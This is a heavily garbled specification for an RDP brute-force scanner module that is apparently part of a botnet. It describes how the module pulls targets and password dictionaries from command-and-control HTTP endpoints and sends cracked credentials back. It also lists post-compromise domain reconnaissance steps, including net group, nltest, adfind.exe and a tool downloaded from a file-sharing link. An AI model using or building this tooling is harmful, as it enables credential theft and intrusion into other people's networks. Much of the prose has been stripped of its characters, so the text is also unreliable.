 RDP 
 



     -    RDP.        ,    modules_HOWTO.




   ,  ,   -.

    :
1)  -
2)  

  -        RDP,        .
  -  ,   .
          ,   .    
 ,      .

  -:
     ,       .
   -     ,      RDP.
     :  RDP.    -     RDP   .
     :,      ,  .     -   .

  try-brute:
 ,  brute,     .

  NOP ( )    ,    .
   :
-   ,         
-   ,     ,      .

         , ,    .

    HTTP-  

GET /<group>/<clientid>/rdp/mode HTTP/1.1

  HTTP-    brute, check, trybrute  nop.
    -       
 5 ;        .
     NOP   NOP. ,  , brute -> check .
       NOP       .

     NOP,   10      .

      NOP   100%    (     -      ).




      HTTP-  

GET /<group>/<clientid>/rdp/domains HTTP/1.1
 group  clientid -   struct ParentInfo
 CHAR ParentID[256];
 CHAR ParentGroup[64];
(. module_HOWTO)

    :
1:[\r]\n
2:[\r]\n
...
(   )

    
ip:port@username:password[\r]\n
...
(   )

     ,     RDP +-10  -.

:        ,          ,   RDP-.

           :

GET /<group>/<clientid>/rdp/over HTTP/1.1

  -  ,    /domains -     .
   ( ,   )      ( )
        10  ( -  ).

      .       ,
     GET-  HTTP-

fmode: 1


   RDP

  ,      RDP.
       .
     ip:port@username.
     ip,     :
	147.126.54.43:3900@username1
	147.126.54.43:3900@username2
	147.126.54.43:3900@username3
	147.126.54.43:3900@username4
    -.


 RDP

    HTTP-   :
GET /<group>/<clientid>/rdp/dict HTTP/1.1

       text/plain,  application/gzip (    Content-Type)
   gzip,         ,    :
-    ,     \n  \r\n.

     (..       ).
   :
%EmptyPass%                              // empty password.
%GetHost%                                // get host name from dns server. Slow speed!
%IP%                                     // get ip (example: 192.168.0.1 = 192.168.0.1)
%Port%                                   // get port (example: 192.168.0.1:3389 = 3389)
   -     .         .

      :
-          (. thread_concurrency  STL)
-      , ..       (. SetThreadPriority())
-           .  ,       ::,
    100      ,             ,
  
-    ,             ,      
     
-    ,   ,   -           ,      
 .

  , ,             config.h   .

    ;        .

          ,     .
        ,      ..
    DPOST (. "   DPOST"   ) 

 POST /<group>/<clientid>/rdp/81 HTTP/1.1

    multipart/form-data   source  data.
  source - "RDP Passwords"
  data:  ,   \r\n
 :

rdp|<address>:<port>|<username>|<password>|<tag>|<field1=value>|<field2=value>|...\r\n
...
(   )

  address:port, username, password    ,
  tag  field1... -   - (.).
 field1=value    =, 
...|subnet=192.168.1.255|netmask=255.255.255.0|...
     ,       .

         HTTP-
GET /<group>/<clientid>/rdp/freq HTTP/1.1

      -   ,      .
  0 -     (   -     ;
   -       )
    -          X ,
    .




      callback (. "module_HOWTO"):
- RDP scanner build %date% %time% started
- %d addresses tried, %d RDP hosts detected, %d passwords found -     (    config.h)
- RDP password found: %addr%:%port%:%username%:%password% -   




      Control().   -     Ctl,   -  CtlArg,
  - CtlArgLen (. "module_HOWTO")

      srv,     ,
 \r\n  \n,   :.
  ,    HTTP,   - HTTPS.
    (http/https),      .
     ,     ,   .


   

      ,       ,
    .
   ,   ,  ,  , 
 .

<>
// CMD,  : 1 - net view,   
//  ,     no network,     
//,    2 - net group "Domain Computers" /DOMAIN, 
//    ,     not in domain, 
//  ,    3 - nltest /domain_trusts /all_trusts, 
//    ,   https://www.sendspace.com/file/172iky,
//,     .bat, bp   
//      subnet,    ,   
//   ,       in domain.
//               DPOST.
</>

    ,   -     :

  1)   ip:port@username:password    

  2)   . 

  ,         (      off). 
      ,      ,     BAD RDP. 
       off,     OFF RDP. 
    ,  ,  ,  ,  ,    ONLINE RDP. 
   ONLINE RDP     IN DOMAIN  NOT DOMAIN
    IN DOMAIN   : subnets, ad_users, ad_computers, ad_ous, ad_group, trustdmp, domainlist

  3)  cmd   whoami/upn. 

    " "/"" -      ON DOMAIN. ""    domainlist
    error,      NOT DOMAIN

  4)     ON DOMAIN     adf.bat, adfind.exe  XXX.exe  ,  

  5)   adf.bat.

      : subnets, ad_users, ad_computers, ad_ous, ad_group, trustdmp, domainlist
     subnets, ad_users, ad_computers, ad_ous, ad_group, trustdmp       (Objects returned)       " txt = "
   txt  domainlist      domainlist

  6)  XXX.exe   .

        ,    .
         XXX.exe
                   XXX.exe,       

  7)      NOT DOMAIN

      XXX.exe, 
   XXX.exe   
        ,    .
         XXX.exe
                   XXX.exe,       

 ,    (   ,      -  adfind),  ,
   tag (    4: bad rdp, off rdp, online rdp in domain, online rdp not in domain)  .,
   .
   -    .
   -      .




   "module_HOWTO"          ,
,    ,  , ,   .


 

         .dll,      GUI.
        rdp.dll,      () ,
  rdp.dll.
,  rpp.dll -  ,  4  Start, Control, FreeBuffer, Release,   
      .
,      Control, , ,   
   HTTP- (    GUI);
GUI      (  ) -   callback (.  Start).

 GUI   :
-   
-   (check/brute)
-       .

    (       -      ),
   -    WinAPI,   QT.     C#   .

  GUI    :
-     - 127.0.0.1: GUI
-     GUI,          
-      callback,     
-           ,    
-      Start();        GUI,   
-      (bad rdp, off rdp )     tag.
